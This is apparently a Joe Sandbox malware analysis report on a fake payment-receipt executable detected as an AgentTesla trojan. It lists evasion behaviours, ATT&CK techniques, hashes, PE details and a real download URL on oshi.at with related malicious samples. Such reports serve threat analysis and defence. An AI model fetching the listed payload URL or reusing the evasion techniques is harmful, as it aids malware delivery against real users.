Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1CF614D0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1CF794D0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1CF611E0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1CF79BF0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77EFC0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77EFD0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77EFF0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77FCF0000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77FD00000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77FD10000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77FD20000 memory reserve | memory write watchJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeMemory allocated: 1D77FD30000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 6816Thread sleep time: -55000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 2060Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe TID: 2060Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe TID: 2852Thread sleep count: 101 > 30Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeThread delayed: delay time: 600000Jump to behavior
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3108402552.0000000001181000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeQueries volume information: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe VolumeInformationJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Software Packing
NTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer4
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
DLL Side-Loading
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PAYMENT_RECEIPT_STAN100699.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
PAYMENT_RECEIPT_STAN100699.exe65%VirustotalBrowse
PAYMENT_RECEIPT_STAN100699.exe100%AviraTR/Dropper.Gen
PAYMENT_RECEIPT_STAN100699.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://oshi.at/qEWc/Y.exe0%Avira URL Cloudsafe
http://oshi.at0%Avira URL Cloudsafe
https://oshi.at/qEWc/Y.exeG/C0%Avira URL Cloudsafe
https://oshi.at0%Avira URL Cloudsafe
https://oshi.at/qEWc/Y.exed0%Avira URL Cloudsafe
http://oshi.atd0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
oshi.at
5.253.86.15
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://oshi.at/qEWc/Y.exefalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://oshi.atdPAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000310C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://oshi.atPAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://oshi.atPAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000310C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003091000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://github.com/somenonymous/OshiUploadPAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000326B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003164000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003129000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000326F000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003180000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003178000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003174000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000316C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000317C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003125000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003170000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003168000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003188000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003184000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://oshi.at/qEWc/Y.exeG/CPAYMENT_RECEIPT_STAN100699.exefalse
        • Avira URL Cloud: safe
        unknown
        https://oshi.at/qEWc/Y.exedPAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.0000000003273000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000312D000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.3122268498.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        5.253.86.15
        oshi.atCyprus
        208046HOSTSLICK-GERMANYNLfalse
        Joe Sandbox Version:38.0.0 Ammolite
        Analysis ID:1335249
        Start date and time:2023-11-01 08:32:28 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 29s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:29
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:PAYMENT_RECEIPT_STAN100699.exe
        Detection:MAL
        Classification:mal72.evad.winEXE@2/0@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 20
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target PAYMENT_RECEIPT_STAN100699.exe, PID 6664 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        5.253.86.15VGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
          wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
            KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
              BHHh.exeGet hashmaliciousUnknownBrowse
                SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                  PO_756380.jsGet hashmaliciousUnknownBrowse
                    PO_756380.jsGet hashmaliciousUnknownBrowse
                      nxIBGfk1rr.exeGet hashmaliciousRedLineBrowse
                        lvm.exe.exeGet hashmaliciousCobaltStrikeBrowse
                          KJkj2S7Clo.exeGet hashmaliciousSmokeLoaderBrowse
                            Draft_Document.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousRedLineBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                oshi.atVGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                • 5.253.86.15
                                wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                • 5.253.86.15
                                KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                • 5.253.86.15
                                BHHh.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                PO_756380.jsGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                PO_756380.jsGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                nxIBGfk1rr.exeGet hashmaliciousRedLineBrowse
                                • 5.253.86.15
                                lvm.exe.exeGet hashmaliciousCobaltStrikeBrowse
                                • 5.253.86.15
                                KJkj2S7Clo.exeGet hashmaliciousSmokeLoaderBrowse
                                • 5.253.86.15
                                Draft_Document.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                file.exeGet hashmaliciousRedLineBrowse
                                • 5.253.86.15
                                rr.exeGet hashmaliciousRedLineBrowse
                                • 51.68.141.111
                                HuJLbnfEq3.exeGet hashmaliciousNymaim, RedLineBrowse
                                • 51.68.141.111
                                b82af5f52e227885b6c58f785785481372a9432e415f4.exeGet hashmaliciousRedLineBrowse
                                • 51.68.141.111
                                5ASHKzytkq.exeGet hashmaliciousRedLine, VidarBrowse
                                • 51.68.141.111
                                Vde6wWF1N3.exeGet hashmaliciousRedLineBrowse
                                • 51.68.141.111
                                INV0100.jsGet hashmaliciousUnknownBrowse
                                • 51.68.141.111
                                doc201002124110300200.exeGet hashmaliciousUnknownBrowse
                                • 51.68.141.111
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                HOSTSLICK-GERMANYNLYegdeajzb.exeGet hashmaliciousRemcosBrowse
                                • 193.142.59.240
                                PRICE_CHART_AND_MORE_DETAILS.exeGet hashmaliciousRemcosBrowse
                                • 193.142.59.6
                                ZH-SA_5012023.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 193.142.59.6
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                • 193.142.59.12
                                8t7XJHwvkR.exeGet hashmaliciousLummaC Stealer, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                • 193.142.59.12
                                GMUDTQ4Ggf.exeGet hashmaliciousAmadey, DanaBot, SmokeLoaderBrowse
                                • 193.142.59.12
                                YLtPLmq2O1.exeGet hashmaliciousAmadey, DanaBot, SmokeLoaderBrowse
                                • 193.142.59.12
                                file.exeGet hashmaliciousAmadey, Djvu, Glupteba, RedLine, SmokeLoader, XmrigBrowse
                                • 193.142.59.12
                                puttygen.exeGet hashmaliciousAgent Tesla, AgentTesla, Amadey, DanaBot, SmokeLoaderBrowse
                                • 193.142.59.12
                                1.exeGet hashmaliciousAgent Tesla, AgentTesla, Amadey, DanaBot, SmokeLoaderBrowse
                                • 193.142.59.12
                                MT-OC201011023_jpeg.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                • 193.142.59.6
                                MT-501011023.exeGet hashmaliciousRemcosBrowse
                                • 193.142.59.6
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                54328bd36c14bd82ddaa0c04b25ed9adU1su8hmVj4ourFo.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                • 5.253.86.15
                                3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                • 5.253.86.15
                                r9yoXOkPES.exeGet hashmaliciousNjratBrowse
                                • 5.253.86.15
                                61BAN1qUS5.exeGet hashmaliciousNjratBrowse
                                • 5.253.86.15
                                file.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                Checkeur netflix validator by crips.exeGet hashmaliciousLimeRATBrowse
                                • 5.253.86.15
                                New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                • 5.253.86.15
                                ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                • 5.253.86.15
                                lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                • 5.253.86.15
                                https://docs.google.com/presentation/d/1mPihsFJvaYn8yxmafo1fNbuOr1nDfR-m05559wjl-9k/pubGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                • 5.253.86.15
                                7nYkVlcnfx.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 5.253.86.15
                                bcAE21roAv.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 5.253.86.15
                                #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                file.exeGet hashmaliciousXFiles StealerBrowse
                                • 5.253.86.15
                                AS9Dqsivqk.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                AS9Dqsivqk.exeGet hashmaliciousUnknownBrowse
                                • 5.253.86.15
                                Invoices.scr.exeGet hashmaliciousAveMariaBrowse
                                • 5.253.86.15
                                ZuXcnAYgVp.exeGet hashmaliciousNjratBrowse
                                • 5.253.86.15
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.587256606080595
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                • Win32 Executable (generic) a (10002005/4) 49.96%
                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:PAYMENT_RECEIPT_STAN100699.exe
                                File size:65'088 bytes
                                MD5:488cd0c21974d76054d33936d477e0cd
                                SHA1:3b9a70a4aaf40b1bada8c337801e35762f9207d2
                                SHA256:6049ebd2d0d4238690c57ad4928ad638d26f1b19de398820e12e3bc86f874db0
                                SHA512:1c30dc5b426dbd13c7b90e500c34c1b4ba0aced697ec774e0f7ebe90aa410ccc6e49bca336d18df4022a483bcc41e829b68e9760c7a38b44a29a5f8271e04917
                                SSDEEP:1536:IX8b/k174ajchuUyj4m7TPxdFP75Fbnd3hT5:IX8bhaghrycmfxvPXj5
                                TLSH:3E538D2477975826C7AE293410D687250730E7CA54E3DB8E31CD73168FA33E25B9B68D
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.................0.............~.... ........@.. ....................................`................................
                                Icon Hash:526c6a52d0e4f047
                                Entrypoint:0x40b77e
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xC000A530 [Fri Jan 29 04:36:00 2072 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Signature Valid:false
                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 13/12/2021 01:00:00 09/01/2025 00:59:59
                                Subject Chain
                                • CN=philandro Software GmbH, O=philandro Software GmbH, L=Stuttgart, S=Baden-W\xfcrttemberg, C=DE
                                Version:3
                                Thumbprint MD5:EAE713DFC05244CF4301BF1C9F68B1BE
                                Thumbprint SHA-1:9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE
                                Thumbprint SHA-256:9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF
                                Serial:0DBF152DEAF0B981A8A938D53F769DB8
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb7300x4b.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1b8c.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0xb8000x4640
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb6ee0x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x97840x9800False0.48373252467105265DIY-Thermocam raw data (Lepton 3.x), scale -10454--28205, spot sensor temperature -0.000048, unit celsius, color scheme 0, calibration: offset 524288.000000, slope 43179624205360936123933285941248.0000005.818606157009926IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xc0000x1b8c0x1c00False0.3441685267857143data5.4356084545884205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
